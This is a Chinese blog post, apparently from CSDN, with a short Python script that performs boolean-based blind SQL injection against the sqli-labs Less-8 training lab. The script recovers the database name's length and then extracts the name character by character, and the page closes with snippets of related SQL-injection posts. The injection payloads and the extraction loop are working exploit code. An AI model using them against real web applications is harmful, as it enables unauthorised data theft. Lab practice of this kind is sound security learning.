Python脚本--SQL盲注

最新推荐文章于 2025-03-05 10:55:49 发布
最新推荐文章于 2025-03-05 10:55:49 发布
阅读量472 收藏 8
点赞数 10
文章标签: python sql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62202418/article/details/134627230
版权
文章讲述了如何使用Python的requests库进行SQL注入攻击,首先获取数据库长度,然后通过逐位查询ASCII值获取数据库名称,以演示Web应用程序安全漏洞利用过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

import requests,string

url= "http://10.1.1.11/sqli-labs/Less-8/"
headers= {
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
}
# 获取数据库长度
def get_db_len(url):
    for i in range(1,100):
        payload=f"?id=1' and length(database())={i} --+"
        full_url= url+ payload
        # print(full_url)
        res= requests.get(url= full_url,headers= headers)
        if "You are in..........." in res.text:
            break
    return i
db_len= get_db_len(url)
print(f"[+] The db_leng is :{db_len}")

# 按位获取数据库名
c_range= string.printable.strip()

def get_db_name():
    db_name= ""
    for i in range(1,db_len+ 1):
        for c in c_range:
            payload= f"?id=1' and ascii(substr(database(),{i},1))={ord(c)} --+"
            full_url= url+ payload
            # print(full_url)
            res= requests.get(url= full_url, headers= headers)
            if "You are in..........." in res.text:
                db_name+= c
                break
    return db_name
db_name= get_db_name()
print(f"[+] The db_name is :{db_name}")

2024年Python最全Python自动化sql入:布尔_布尔脚本
2301_82244514的博客
04-30 756
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
python sql入检测脚本_sql脚本
weixin_36484714的博客
02-09 1323
摘要本篇文章对原理的解释占据主要,输出的美化部分不做详细解释一. 成果展示假设我的数据库有这些那么通过sql入把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理对sql-labs的前四关有效,其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql入,而今天的核心就在于三个表达式select * from users where id='-1' uni...
sql入测试脚本
03-17
sql入常用的测试语句大全,方便进行渗透测试和sql入测试。
sql入分析+sql脚本开发(基础篇)
最新发布
2401_85773496的博客
03-05 904
简介:所谓SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
(ZZ)SQL入分析(手动入检测) and 手动脚本命令精华版
weixin_34061482的博客
09-25 100
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL入分析(手动入检测) and 手动脚本命令精华版
唯一谣|Airs|走尽天涯路|极地阳光
01-23 8241
SQL入分析(手动入检测) and 手动脚本命令精华版 入侵过程主要包括以下几个步骤:1、测试ASP系统是否有入漏洞;2、获取数据库表名;3、测试管理 员ID;4、测试管理员用户名长度和管理员密码长度;5、从高到低依次测试出管理员用户名和密码。
python sql脚本_python打造一个分析网站SQL入的脚本
weixin_39600510的博客
12-03 294
1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站7 url="...
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
时间python脚本.zip
12-28
在本压缩包"时间python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间自动化攻击。 首先,我们来详细了解一下时间的基本原理。当服务器执行...
布尔python脚本.zip
12-28
在给定的压缩包文件"布尔python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔原理**...
布尔.py_sqlpython_
10-03
在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,它显然是用于演示或执行SQL的工具。 在SQL中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
python SQL入测试脚本(更新中)
weixin_30871293的博客
03-13 765
1 import requests 2 import json 3 import warnings 4 warnings.filterwarnings("ignore") 5 6 url = 'https://1.1.1.1/xx/1.0/apiGateway/createSource' 7 headers = {'User-Agent': 'Mozilla/5.0...
python脚本SQLlib靶场_Python 是我用过最糟糕的语言之一
weixin_39636691的博客
11-14 236
搜了下知乎居然没有一个吐槽Python的,吐槽js的倒挺多。作为近年在AI加持下大热的语言,我来斗胆吐槽一下,看看是否有人感同身受,也欢迎资深Python程序员反驳start:没有Let等局部变量声明(Scala有block,Haskell,Idris,Ocaml,es6的Let, js的 var),你无法可靠地在局部引入一个变量,一不小心就把全局变量改了。我觉得这个是最无法忍受的。所有绑定都是可...
SQL入技术和跨站脚本攻击的检测
flyingdream123的专栏
02-17 768
SQL入技术和跨站脚本攻击的检测 Posted on 2007-06-25 12:22 黔人阿诺 阅读(33) 评论(0)  编辑 收藏 网摘 所属分类: 网站安全 <!--<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"xmlns:dc="http://
python脚本SQLlib靶场_Python爬虫与反反爬虫实践
weixin_39545895的博客
10-21 335
因为要收集数据,所以打算自己撸一个爬虫,期间碰到网站的反爬措施,让我非常头疼,在此记录一下。基础爬虫的基础是不需要自己手动通过浏览器访问网页,而是通过程序构造网络请求,获取网站返回的结果。例如使用python的requests库发送请求:import 得到返回的html代码后,可以自己解析数据,获取感兴趣的内容。前期分析首先分析要爬的网站,本质是一个信息查询系统,提供了搜索页面。例如我想获取某个c...
python实现sql脚本
czx1234566的博客
11-30 2186
根据dblen这个变量的不断变化,然后用这不断变化返回值写了一个if判断去判断是否有这个返回值里是否有“You are in...........”字符串。之后的爆表名,列名,字段等,都类似,该下payload就行了,还有这个i的值是可以变的,如果不知道表名的长度,就给i的值的范围给大一点。这个原理同刚刚所说,只是换了个payload,i是用来代表数据库的长度。输入id=1,这个返回的是正确的页面咯,那来看看错误的。然后我们就以这个为特征,围绕着这个去写个脚本。个人认为就是找特征,围绕着这个特征去写脚本
sql-lab less8 python脚本
m0_74013288的博客
11-05 125
print("第一个表为:" + table1_name)print("第二个表为:" + table2_name)print("第三个表为:" + table3_name)print("第四个表为:" + table4_name)print("第一个字段为->" + column1)# 因为数据库里面有多张表,所以需要再嵌套一个遍历,这个遍历所对应的是limit取值。print("数据库名称为:" + db_name)print("flag为->" + flag)# 获取sql入生成后的页面。
sql脚本1
m0_55772907的博客
05-01 1029
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql入") else: print("不存在")
Python实现SQL技术详解与脚本应用
资源摘要信息:"该文件标题为'布尔.py_sqlpython_',描述为'一个简单的sqlpython脚本,其中语句需要根据环境条件做改变'。文件标签为'sqlpython'。压缩包子文件的文件名称为'布尔.py'。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值